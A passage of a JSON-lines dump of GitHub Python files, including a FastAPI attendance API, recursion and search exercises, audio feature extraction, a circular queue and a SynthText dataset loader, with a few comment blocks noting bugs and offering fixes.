Regression score: \")\nprint(crossValidation(I_data, I_label, 10, l1lrClf))\n\nl2lrClf = LogisticRegression(penalty='l2', tol=0.01)\nprint(\"L2 Logistic Regression score: \")\nprint(crossValidation(I_data, I_label, 10, l2lrClf))\n\n\n 
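# crossValidation above divides its running totals by a literal 10.00, so it
# silently mis-averages for any fold_num other than 10; dividing by fold_num,
# or letting scikit-learn do the bookkeeping, avoids that (toy data only):
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_validate

X, y = make_classification(n_samples=200, random_state=0)
scores = cross_validate(LogisticRegression(max_iter=1000), X, y,
                        cv=10, scoring=('precision', 'recall', 'f1'))
print(scores['test_f1'].mean())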
\t\n","repo_name":"Hackerhack0912/CS638","sub_path":"stage4/bestMatcherNew.py","file_name":"bestMatcherNew.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6573408499","text":"from fastapi import APIRouter, HTTPException, status,Depends\nfrom database.StudentAttendence_db import ( \n addSTD_attendence,\n viewSTD_attendence,\n modifySTD_attendence,\n searchSTD_attendence,\n deleteSTD_attendenceid\n)\nfrom models.StudentAttendence import StudentAttendence,StudentAttendence_modify\nfrom database.auth import AuthHandler\nauth_handler=AuthHandler()\n\nrouter = APIRouter(\n prefix=\"/stdattendence\",\n tags=[\"Student_attendence\"],\n dependencies=[Depends(auth_handler.auth_wrapper)],\n responses={404: {\"description\": \"Not found\"}},)\n\n\n@router.get(\"/\" )\nasync def view_STD_attendence(user=Depends(auth_handler.auth_wrapper)):\n auth_handler.has_permission(user, 'view_employee')\n\n response = await viewSTD_attendence()\n if response: \n return {\n \"status\" : status.HTTP_200_OK, \n \"STD_attendences\" : response }\n return {\"error\": status.HTTP_204_NO_CONTENT} \n\n\n@router.get(\"/{STD_attendence_id}\")\nasync def search_STD_attendence(STD_attendence_id:str):\n # print(STD_attendence_id)\n response = await searchSTD_attendence(STD_attendence_id)\n return response\n\n\n\n@router.post(\"/\")\nasync def mark_STD_attendence(STD_attendence : StudentAttendence):\n response = await addSTD_attendence(STD_attendence.dict())\n if response==True:\n return {\"response \": \"Successfully added . . .\",\n \"status\" : status.HTTP_200_OK} \n return {\"response\" : response, \"status\" :status.HTTP_203_NON_AUTHORITATIVE_INFORMATION }\n\n\n@router.put(\"/modify/{STD_attendence_id}\")\nasync def modify_STD_attendence(STD_attendence_id: str , data : StudentAttendence_modify):\n response = await modifySTD_attendence(STD_attendence_id, data.dict(exclude_none=True))\n return response\n\n\n@router.delete('/{id}')\nasync def delete_std_id(id: str):\n \n response = await deleteSTD_attendenceid(id)\n if not response:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'No record with id: {id} found')\n return { \"Status\":\"Succesfully deleted \",\n \"status_code \" : status.HTTP_200_OK}\n\n\n\n\n","repo_name":"khizar596/sms_backend","sub_path":"routes/StudentAttendence_route.py","file_name":"StudentAttendence_route.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7454899812","text":"#create a fibonacci series number\n#using recursion\nimport sys\n\n#recursive function to find fibonaccis series \ndef fibonacci(n):\n\tif(n == 1): #base case 1\n\t\treturn 0 \n\telif(n == 2): #base case 2\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-1) + fibonacci(n-2)\n\n\nnum = int(input(\"Please eneter the numbe: \"))\n\n#make sure number is positive\nif(num < 0):\n\tprint(\"number needs to be positive\")\n\tsys.exit(0)\n\n#call to reccursive function\noutput = fibonacci(num)\n\nprint(\"The {0} fibonacci number in series is {1}\".format(num, output))\n","repo_name":"soundzues/Python-Practice","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41407700686","text":"# Programmed by MD. 
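# The recursive fibonacci above recomputes each subproblem exponentially many
# times; caching the same recursion makes it linear in n while keeping the
# script's 1-indexed convention (fibonacci(1) == 0):
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    if n <= 2:
        return n - 1
    return fib(n - 1) + fib(n - 2)

assert [fib(i) for i in range(1, 8)] == [0, 1, 1, 2, 3, 5, 8]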
Mehedi Hasan\r\n\r\nimport random\r\n\r\nlist_size = 20\r\nmy_list = random.sample(list(range(1, 40)), list_size)\t# get some random numbers\r\nmy_list = sorted(my_list)\r\n\r\nprint(\"List:\")\r\nprint(my_list)\r\n\r\ndef binary_search(list, item):\r\n\tlow = 0\r\n\thigh = len(list) - 1\r\n\t\r\n\twhile low <= high:\r\n\t\tmid = (low + high) // 2\t# integer midpoint of the current search range\r\n\t\tguess = list[mid]\r\n\t\tif guess == item:\r\n\t\t\treturn mid\r\n\t\tif guess > item:\r\n\t\t\thigh = mid - 1\r\n\t\telse:\r\n\t\t\tlow = mid + 1\r\n\treturn None\r\n\r\nprint(\"\\nIndex of the item:\")\r\nprint(binary_search(my_list, 11))\r\n","repo_name":"Mehedi61/Algorithms","sub_path":"algorithms/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25011997275","text":"'''\nAccept N numbers from user and display all such numbers which contain 3 digits in it.\nInput : N : 6 \nElements : 8225 665 3 76 953 858\nOutput : 665 953 858 \n'''\n\ndef AcceptElements(arr,size):\n print(\"Enter the elements:\");\n for i in range(0,size):\n arr.append(int(input()));\n \ndef DisplayElements(arr):\n for i in arr:\n print(i);\n \ndef DisplayThreeDigitNumber(arr):\n print(\"Result:\");\n for num in arr:\n iCnt = 0;\n temp = num;\n while(temp != 0):\n iCnt = iCnt+1;\n temp = int(temp/10);\n if(iCnt == 3):\n print(num);\n\ndef main():\n size = int(input(\"Enter number of elements: \"));\n arr = [];\n AcceptElements(arr,size);\n print(\"Entered elements are:\");\n DisplayElements(arr);\n DisplayThreeDigitNumber(arr);\n\nif __name__ == \"__main__\":\n main();","repo_name":"Aditya-A-Pardeshi/Coding-Hands-On","sub_path":"4 Python_Programs/5 Problems on N numbers/18_DisplayNumbers_WithThreeDigits/Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32589014342","text":"\"\"\"\nScript to add a person's name to the front of 100 files that were all (foolishly) given the same name\nIt's a hassle, so cd into that folder before running this code\n\"\"\"\n\nimport os\n\nperson_name = \"hyemi\"\nfolder_path = \"./Preprocess/hyemi/scissor\"\nfiles = os.listdir(folder_path)\n\nfor file_name in files:\n old_path = os.path.join(folder_path, file_name)\n \n new_file_name = person_name + file_name\n new_path = os.path.join(folder_path, new_file_name)\n \n os.rename(old_path, new_path)\n print(f\"Renamed '{file_name}' to '{new_file_name}'\")\n\nprint(f\"Completed {folder_path}\")\n","repo_name":"Hyempire/RockPaperScissor","sub_path":"Preprocess/changeName.py","file_name":"changeName.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23559445695","text":"import argparse\nimport multiprocessing\nimport os\nfrom os import PathLike\nfrom typing import List, Union\n\nimport h5py\nimport librosa\nimport numpy as np\nimport paddleaudio as pa\nimport yaml\nfrom paddleaudio.utils.log import Logger\nimport paddle\nlogger = Logger(__file__)\nimport torchaudio\nimport torch\n\n\nclass FeatureExtractor:\n def __init__(self, **kwargs):\n self.kwargs = kwargs\n self.transform = pa.transforms.MelSpectrogram(**kwargs)\n #self.transform = torchaudio.transforms.MelSpectrogram(**kwargs)\n\n def process_wav(self, wav: Union[PathLike, np.ndarray]) -> np.ndarray:\n\n if isinstance(wav, str):\n wav, sr = librosa.load(wav, sr=None)\n #wav, sr = pa.load(wav, sr=None)\n target_sr = self.kwargs.get('sr')\n #assert sr == target_sr, f'sr: {sr} ~= {target_sr}'\n\n if wav.dtype == 
'int16':\n wav = pa.depth_convert(wav, 'float32')\n wav = paddle.to_tensor(wav).unsqueeze(0)\n x = self.transform(wav)\n return x\n\n\ndef wav_list_to_fbank(wav_list: List[PathLike],\n key_list: List[str],\n dst_file: PathLike,\n feature_extractor: FeatureExtractor) -> None:\n \"\"\"Convert wave list to fbank, store into an h5 file\n \"\"\"\n dst_file = os.path.expanduser(dst_file)\n logger.info(f'saving to {dst_file}')\n dst_h5_obj = h5py.File(dst_file, \"w\")\n logger.info(f'{len(wav_list)} wav files listed')\n for f, key in zip(wav_list, key_list):\n x = feature_extractor.process_wav(f)\n dst_h5_obj.create_dataset(key, data=x)\n dst_h5_obj.close()\n\n\ndef wav_list_to_fbank_mp(params):\n \"\"\"Convert wave list to fbank, store into an h5 file, multiprocessing warping\"\"\"\n\n wav_list, key_list, dst_file = params\n wav_list_to_fbank(wav_list, key_list, dst_file, feature_extractor)\n\n\ndef read_scp(scp_file):\n scp_file = os.path.expanduser(scp_file)\n with open(scp_file) as f:\n lines = f.read().split('\\n')\n\n# import pdb;pdb.set_trace()\n names = [l.split()[0] for l in lines if len(l) > 1]\n files = [l.split()[1] for l in lines if len(l) > 1]\n return names, files\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='wave2mel')\n parser.add_argument(\n '-c', '--config', type=str, required=True, default='config.yaml')\n args = parser.parse_args()\n\n with open(args.config) as f:\n config = yaml.safe_load(f)\n paddle.set_device(config['device'])\n feature_extractor = FeatureExtractor(**config['fbank'])\n\n names, wav_files = read_scp(config['wav_scp'])\n n_file_per_h5 = config['h5']['n_wavs']\n if n_file_per_h5 == -1:\n logger.info('no grouping')\n n_group = 1\n group_files = [wav_files]\n group_names = [names]\n\n else:\n logger.info(f'grouping {n_file_per_h5} files into one h5 file')\n n_group = len(wav_files) // n_file_per_h5 + 1\n group_files = [\n wav_files[i * n_file_per_h5:(i + 1) * n_file_per_h5]\n for i in range(n_group)\n ]\n group_names = [\n names[i * n_file_per_h5:(i + 1) * n_file_per_h5]\n for i in range(n_group)\n ]\n\n os.makedirs(config['h5']['output_folder'], exist_ok=True)\n\n n_workers = config['num_works']\n logger.info(f'Using {n_workers} process(es)')\n if n_workers <= 1:\n for i in range(n_group):\n logger.info(f'processing group {i}/{n_group}')\n prefix = config['h5']['prefix']\n dst_file = os.path.join(config['h5']['output_folder'],\n f'{prefix}-{i:05}.h5')\n logger.info(f'saving file to {dst_file}')\n wav_list_to_fbank(group_files[i], group_names[i], dst_file,\n feature_extractor)\n else:\n pool = multiprocessing.Pool(n_workers)\n dst_files = []\n # Collect multi-processing parameters\n for i in range(n_group):\n prefix = config['h5']['prefix']\n dst_file = os.path.join(config['h5']['output_folder'],\n f'{prefix}-{i:05}.h5')\n dst_files.append(dst_file)\n params = [(file, name, dst_file)\n for file, name, dst_file in zip(group_files, group_names,\n dst_files)]\n\n pool.map(wav_list_to_fbank_mp, params)\n pool.close()\n pool.join()\n","repo_name":"ranchlai/preprocessing","sub_path":"wav2fbank.py","file_name":"wav2fbank.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5670778998","text":"from pyramid.config import Configurator\nfrom pyramidattachs.resources import Root\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n config = Configurator(root_factory=Root, 
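# wav2fbank above chops the wav list into fixed-size groups and maps a worker
# over one argument tuple per group with multiprocessing.Pool; a stripped-down
# sketch of that group-then-map pattern (the worker is a stand-in, not the
# real feature extractor):
import multiprocessing

def work(args):
    group_id, items = args
    return group_id, sum(items)

if __name__ == '__main__':
    items = list(range(10))
    per_group = 4
    groups = [items[i:i + per_group] for i in range(0, len(items), per_group)]
    with multiprocessing.Pool(2) as pool:
        print(pool.map(work, list(enumerate(groups))))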
settings=settings)\n config.add_view('pyramidattachs.views.my_view',\n context='pyramidattachs:resources.Root',\n renderer='pyramidattachs:templates/mytemplate.pt')\n config.add_static_view('static', 'pyramidattachs:static')\n return config.make_wsgi_app()\n\n","repo_name":"bireme/isisdm","sub_path":"examples/pyramid-attachs/build/lib.linux-x86_64-2.6/pyramidattachs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6906034979","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Time-stamp: \"2023-04-23 11:02:45 (ywatanabe)\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\nimport mngs\nimport numpy as np\n\n\nclass ChannelGainChanger(nn.Module):\n def __init__(\n self,\n n_chs,\n ):\n super().__init__()\n self.n_chs = n_chs\n\n def forward(self, x):\n \"\"\"x: [batch_size, n_chs, seq_len]\"\"\"\n if self.training:\n ch_gains = (\n torch.rand(self.n_chs).unsqueeze(0).unsqueeze(-1).to(x.device) + 0.5\n )\n ch_gains = F.softmax(ch_gains, dim=1)\n x *= ch_gains\n\n return x\n\n\nif __name__ == \"__main__\":\n ## Demo data\n bs, n_chs, seq_len = 16, 360, 1000\n x = torch.rand(bs, n_chs, seq_len)\n\n cgc = ChGainChanger(n_chs)\n print(cgc(x).shape) # [16, 19, 1000]\n\n # sb = SubjectBlock(n_chs=n_chs)\n # print(sb(x, s).shape) # [16, 270, 1000]\n\n # summary(sb, x, s)\n","repo_name":"ywatanabe1989/mngs","sub_path":"src/mngs/nn/_ChannelGainChanger.py","file_name":"_ChannelGainChanger.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18814124209","text":"# Problem Statement.\n'''\n A1\n AB12\n ABC123\nABCD1234\n'''\nA=[0,\"A\",\"B\",\"C\",\"D\"]\nfor i in range(1,5):\n k = 1\n m = 1\n for j in range(1,9):\n if j>=(5-i) and j<=(4+i):\n if j <= 4:\n print(f\"{A[k]}\",end=\"\")\n k += 1\n else:\n print(m, end=\"\")\n m+=1\n else:\n print(\" \",end=\"\")\n print(\"\")","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"tringle22.py","file_name":"tringle22.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29368914953","text":"import pandas as pd\nimport numpy as np\n\ndef processdata(datafile):\n df = pd.read_csv(datafile)\n df = df[df['task'] == 'response']\n df = df[['data_type', 'L1', 'Excerpt1', 'L2', 'Excerpt2', 'Stimulus1', 'Stimulus2', 'time_elapsed', 'timestamp', 'rt', 'response']]\n \n for i, row in df.iterrows():\n df.at[i, 'response'] = int(row['response']) + 1\n \n df = df.astype({'Excerpt1': int, 'Excerpt2': int})\n df.index = np.arange(1, len(df) + 1)\n df.index.name = \"trial number\"\n df.to_csv(datafile[:-4] + \"_cleaned.csv\")\n\nif __name__ == \"__main__\":\n processdata(\"subj_2_trialList_3_data.csv\")\n","repo_name":"yejoo104/universality","sub_path":"data/processdata.py","file_name":"processdata.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9273541641","text":"import hexagon\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport user\nimport sys\n\nr = float(sys.argv[1])\ninner = float(sys.argv[2])\npower = 80e-4\n\ncells = np.array([])\ncells = np.append(cells,[hexagon.Hexagon(np.array([0.,0.]),r,1,4,0,inner)])\n\npoints = 
np.array([[2,2],[1.5,2],[1,2],[0.5,2],[0,2],[-0.5,2],[-1,2],[-1.5,2],[-2,2],[-2.2,1.3],[-2.1,0],[-2,-0.7],[-2,-2],[0,-2],[2,-2],[2,-0.1],[2.1,0]])\nindex = 1\n\n\nlisting = np.array([[0,0],[0,0]])\n\ndoing = True\n\nwhile(doing):\n doing = False\n for k in points:\n there = False\n for p in listing:\n if(np.array_equal(k,p)):\n there = True\n #print(k,p)\n if(not there):\n doing = True\n #print('in?')\n distance = 1e6\n cell = np.NaN\n for j in range(cells.shape[0]):\n \n closed,dist = cells[j].closest(k)\n\n temp1 = np.dot(dist[0],dist[0])\n if(temp1 bool:\n \"\"\"\n Insert an element into the circular queue. Return true if the operation is successful.\n \"\"\"\n if (self.isEmpty()):\n self.head = 0\n self.tail = 0\n elif (self.isFull()):\n return;\n else:\n self.tail = (self.tail + 1) % self.capacity\n self.array[self.tail] = value\n\n return True\n\n def deQueue(self) -> bool:\n \"\"\"\n Delete an element from the circular queue. Return true if the operation is successful.\n \"\"\"\n if (self.isEmpty()):\n return\n elif (self.head == self.tail):\n self.head = -1\n self.tail = -1\n else:\n self.head = (self.head + 1) % self.capacity\n\n return True\n\n def Front(self) -> int:\n \"\"\"\n Get the front item from the queue.\n \"\"\"\n if (self.isEmpty()):\n return -1\n\n return self.array[self.head]\n\n def Rear(self) -> int:\n \"\"\"\n Get the last item from the queue.\n \"\"\"\n if (self.isEmpty()):\n return -1\n return self.array[self.tail]\n\n def isEmpty(self) -> bool:\n \"\"\"\n Checks whether the circular queue is empty or not.\n \"\"\"\n if (self.head == -1 and self.tail == -1):\n return True\n return False\n\n def isFull(self) -> bool:\n \"\"\"\n Checks whether the circular queue is full or not.\n \"\"\"\n if (self.head == ((self.tail + 1) % self.capacity)):\n return True\n return False","repo_name":"Melinal23/Stack-And-Queues","sub_path":"MyCircularQueue.py","file_name":"MyCircularQueue.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43060277888","text":"class Weapon:\n def __init__(self, name, lvl, attack_bonus, damage):\n self.name = name\n self.lvl = lvl\n self.attack_bonus = attack_bonus\n self.damage = damage\n\n\nbattleaxe = Weapon(\"battleaxe\", 1, 1, [1, 8, 2]) # where [1, 8, 2] is 1d8+2\nscimitar = Weapon(\"scimitar\", 1, 3, [1, 6, 1])\nsickle = Weapon(\"sickle\", 1, 5, [1, 4, 1])\nshortsword = Weapon(\"shortsword\", 3, 3, [1, 6, 2])\nmaul = Weapon(\"maul\", 3, 0, [2, 6, 1])\nwar_pick = Weapon(\"war pick\", 3, 2, [1, 8, 0])\nlance = Weapon(\"lance\", 5, 2, [1, 12, 0])\nrapier = Weapon(\"rapier\", 5, 4, [1, 8, 2])\nlongsword = Weapon(\"longsword\", 7, 5, [1, 8, 3])\ngreatsword = Weapon(\"greatsword\", 7, 2, [2, 6, 3])\nhalebard = Weapon(\"halebard\", 9, 5, [1, 10, 5])\ngreataxe = Weapon(\"greataxe\", 9, 3, [1, 12, 5])\n","repo_name":"Palmofff/dungeon-crawler-study-task","sub_path":"equipment/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29903681576","text":"import os\nimport numpy as np\nimport json\nimport joblib\n\ndef init():\n print(\"This is init\")\n global model\n model_path = os.path.join(os.getenv('AZUREML_MODEL_DIR'),'model.pkl')\n model = joblib.load(model_path)\n\ndef run(data):\n test = json.loads(data)\n print(f\"received data {test}\")\n try:\n data = np.array(json.loads(data))\n result = model.predict(data)\n 
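# MyCircularQueue above encodes empty as head == -1 and full as
# head == (tail + 1) % capacity. Its __init__ is lost in the truncated record,
# so this driver assumes it stored k as self.capacity, allocated
# self.array = [0] * k, and set head = tail = -1 (and that enQueue stores the
# value on the first, empty-queue insert as well):
q = MyCircularQueue(3)
for v in (1, 2, 3):
    q.enQueue(v)
assert q.isFull() and q.Front() == 1 and q.Rear() == 3
q.deQueue()      # frees the slot at the head
q.enQueue(4)     # tail wraps around to index 0
assert q.Front() == 2 and q.Rear() == 4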
return result.tolist()\n except Exception as err:\n return str(err)","repo_name":"arunanshupandey/nd00333-capstone","sub_path":"starter_file/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"35626449355","text":"import requests\r\nimport api_const\r\nimport csv\r\nimport logging\r\nimport sys\r\nsys.path.insert(1, '../util/')\r\nsys.path.insert(2, \"C:/OscarScripts/util\")\r\nfrom calendar_datetime import get_today_date_yyyymmdd\r\nfrom calendar_datetime import get_today_wkday\r\nimport os\r\n\r\n\r\ndef put_demographic(headers, instance):\r\n # mdstaff_id should be passed as a hash\r\n wkday = get_today_wkday()\r\n dir_path = os.path.dirname(os.path.realpath(__file__))\r\n log_file = dir_path + api_const.log_file\r\n\r\n logging.basicConfig(\r\n filename = log_file, \\\r\n filemode = 'a', \\\r\n level = logging.INFO, \\\r\n format = \"%(levelname)s %(name)s %(asctime)s %(lineno)s - %(message)s \")\r\n logger = logging.getLogger(__name__)\r\n logger.info(wkday + \". Starting PUT DEMOGRAPHIC API\")\r\n \r\n \r\n with open (\"output_final2.txt\", \"r\") as input_fh:\r\n csv_reader = csv.reader(input_fh, delimiter = \"|\")\r\n for row in csv_reader:\r\n providerid = row[5]\r\n firstname = row[3].strip().title()\r\n middlename = row[4].strip().title()\r\n lastname = row[2].strip().title()\r\n\r\n api_url = api_const.api_url + instance + \"/demographic/\" + providerid\r\n \r\n logger.info(wkday + \". API URL: \" + api_url)\r\n \r\n data = '{\"FirstName\":\"' + firstname + '\", \"MiddleName\":\"' + middlename + '\",\"LastName\":\"' + lastname + '\"}'\r\n print(data)\r\n \r\n try:\r\n response = requests.put(api_url, \\\r\n headers = headers, \\\r\n data = data, \\\r\n timeout = (250, 500))\r\n response.raise_for_status()\r\n \r\n except requests.exceptions.RequestException as err:\r\n logger.critical(wkday + \". Oops: Something Else: \" + str(err))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.HTTPError as errh:\r\n logger.critical(wkday + \". Http Error: \" + str(errh))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.ConnectionError as errc:\r\n logger.critical(wkday + \". Error Connecting: \" + str(errc))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.Timeout as errt:\r\n logger.critical(wkday + \". Timeout Error: \" + str(errt))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". 
\" + data)\r\n continue\r\n \r\n response_json = response.json()\r\n \r\n logger.info(\"Return code: \" + str(response.status_code))\r\n \r\n\r\n\r\ndef email_data():\r\n sccids_to_emails_hash = {}\r\n with open(\"SantaClara_66403_20200709-1002.txt\", \"r\") as input_fh:\r\n csv_reader = csv.reader(input_fh, delimiter = \"|\")\r\n for row in csv_reader:\r\n email = row[15]\r\n sccid = row[4]\r\n sccids_to_emails_hash[sccid] = email\r\n return sccids_to_emails_hash\r\n\r\n\r\n\r\ndef main():\r\n\r\n put_demographic(headers, \\\r\n instance)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ohur/mdstaff_public","sub_path":"api_put_demographic.py","file_name":"api_put_demographic.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74508612568","text":"import torch\nimport os\nfrom PIL import Image\nimport numpy as np\nfrom scipy.misc import imread, imresize\nimport codecs\nimport json\nimport cv2\nimport torch\nfrom scipy.special import comb as n_over_k\nimport scipy.io as sio\nfrom tqdm import tqdm\n# import unicode\nfrom .augs import PSSAugmentation, SythAugmentation, TestAugmentation\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n# from maskrcnn_benchmark.structures.boxlist_ops import box_xyxy_to_xyxy\n# from .utils import *\n# from maskrcnn_benchmark.structures.segmentation_mask import SegmentationMask, Polygons\n# from maskrcnn_benchmark.utils.rec_util import LabelMap\n\ndef text_list_generate(text):\n word_list = []\n for part in text:\n part_word_list = part.strip().replace(' ', '\\n').split('\\n')\n for i in range(len(part_word_list)-1, -1, -1):\n if part_word_list[i] == '':\n part_word_list.remove('')\n word_list += part_word_list\n return word_list\n\ndef filter_word(text,chars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):\n char_list = [c for c in text if c in chars]\n return \"\".join(char_list)\n\ndef load_ann(img_path, filter_tag=False):\n txt_folder = \"/home/wanghao/datasets/SynthText/Text_GT\"\n gt = os.path.join(txt_folder, img_path.split('/')[-1].replace('.jpg', '.txt').replace('.png', '.txt').replace('.gif', '.txt'))\n # print(gt,img_path)\n # gt = unicode(gt, 'utf-8')#gt.decode('utf-8')\n item = {}\n item['polys'] = []\n item['tags'] = []\n item['texts'] = []\n item['gt_path'] = gt\n item['img_path'] = img_path\n # print(gt)\n reader = codecs.open(gt,encoding='utf-8').readlines()\n # reader = open(gt).readlines()\n for line in reader:\n parts = line.strip().split(',')\n if filter_tag:\n # label = 'fakelabel'\n label = parts[-1]\n else:\n label = parts[-1]\n label = filter_word(label)\n if len(label)<3:\n continue\n if label == '###':\n continue\n line = [i.strip('\\ufeff').strip('\\xef\\xbb\\xbf') for i in parts]\n # if filter_tag:\n # xmin, ymin, xmax, ymax = list(map(float, line[:4]))\n # item['polys'].append([[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]])\n # else:\n x1, y1, x2, y2, x3, y3, x4, y4 = list(map(float, line[:8]))\n item['polys'].append(get_ordered_polys(np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])))\n item['texts'].append(label.lower())\n if label == '###':\n item['tags'].append(True)\n else:\n item['tags'].append(False)\n # if filter_tag:\n # if len(item['polys'])==0:\n # return None, None, None\n item['polys'] = np.array(item['polys'], dtype=np.float32)\n item['tags'] = np.array(item['tags'], dtype=np.bool)\n 
item['texts'] = np.array(item['texts'], dtype=np.str)\n \n return item['img_path'], item['polys'], item['texts']\n \ndef get_ordered_polys(cnt):\n points = list(cnt)\n ps = sorted(points,key = lambda x:x[0])\n\n if ps[1][1] > ps[0][1]:\n px1 = ps[0][0]\n py1 = ps[0][1]\n px4 = ps[1][0]\n py4 = ps[1][1]\n else:\n px1 = ps[1][0]\n py1 = ps[1][1]\n px4 = ps[0][0]\n py4 = ps[0][1]\n if ps[3][1] > ps[2][1]:\n px2 = ps[2][0]\n py2 = ps[2][1]\n px3 = ps[3][0]\n py3 = ps[3][1]\n else:\n px2 = ps[3][0]\n py2 = ps[3][1]\n px3 = ps[2][0]\n py3 = ps[2][1]\n\n return np.array([[px1, py1], [px2, py2], [px3, py3], [px4, py4]])\n\nclass SynthText(object):\n def __init__(self, img_folder):\n self.generate_information(img_folder)\n self.difficult_label = \"###\"\n def generate_information(self, img_folder):\n gt_mat = os.path.join(img_folder, 'gt.mat')\n s_data = sio.loadmat(gt_mat)\n names = s_data['imnames']\n name = names[0]\n image_path_list = [os.path.join(img_folder, name_i[0]) for name_i in name]\n gt_folder = \"/home/wanghao/datasets/SynthText/Text_GT\"\n gt_path_list = [os.path.join(gt_folder, gt) for gt in os.listdir(gt_folder)]\n self.image_path_list = sorted(image_path_list)\n self.gt_path_list = sorted(gt_path_list)\n self.filter_tag = True\n self.sample_num = len(self.image_path_list)\n # import pdb\n # pdb.set_trace()\n def len(self):\n return self.sample_num\n def getitem(self,index):\n img_path, polys, texts = load_ann(self.image_path_list[index], self.filter_tag)\n # if img_path == None:\n # index = 0\n # img_path, polys, texts = load_ann(self.image_path_list[index], self.filter_tag)\n return img_path, polys, texts\n\nclass SynthTextDataset(torch.utils.data.Dataset):\n def __init__(self, data_dir, transforms=None, is_train=True, augment=None):\n super().__init__()\n self.dataset = SynthText(data_dir)\n # print(self.dataset.len())\n # print(is_train)\n self.is_train = is_train\n self.transforms = transforms\n self.augment = eval(augment)()\n\n def __len__(self):\n return self.dataset.len()\n\n def __getitem__(self, index):\n if self.is_train:\n polys = []\n while len(polys) ==0:\n img_path, polys, texts = self.dataset.getitem(index)\n index = np.random.randint(0,len(self))\n img = imread(img_path, mode=\"RGB\")\n assert len(polys)==len(texts),print(polys,texts)\n aug_img, polys, tags = self.augment(img, polys, texts)\n boxes = []#[[np.min(poly[:,0]), np.min(poly[:,1]), np.max(poly[:,0]), np.max(poly[:,1])] for poly in polys]\n # # boxes = np.array(boxes).reshape([-1,4])\n # order_polys = []\n # boundarys = []\n for poly in polys:\n boxes.append([np.min(poly[:,0]), np.min(poly[:,1]), np.max(poly[:,0]), np.max(poly[:,1])])\n # boundarys.append(pts_expand)\n # order_polys.append(get_ordered_polys(poly))\n # cv2.drawContours(aug_img, pts_expand.reshape([1,-1,2]).astype(np.int32),-1,color=(255,0,0),thickness=1)\n # cv2.imwrite(os.path.join('vis',os.path.basename(path)), aug_img[:,:,(2,1,0)])\n boxes = np.array(boxes).reshape([-1,4])\n # order_polys = np.array(order_polys).reshape([-1,8])\n # boundarys = np.array(boundarys).reshape([-1,NUM_POINT*4])\n image = Image.fromarray(aug_img.astype(np.uint8)).convert('RGB')\n\n boxlist = BoxList(boxes, image.size, mode=\"xyxy\")\n # boxlist.add_field('polys',torch.tensor(order_polys))\n # boxlist.add_field('boundarys',torch.tensor(boundarys))\n boxlist.add_field('labels',torch.tensor([-1 if text==self.dataset.difficult_label else 1 for text in tags]))\n boxlist.add_field('texts',tags)\n if self.transforms:\n image, boxlist = self.transforms(image, 
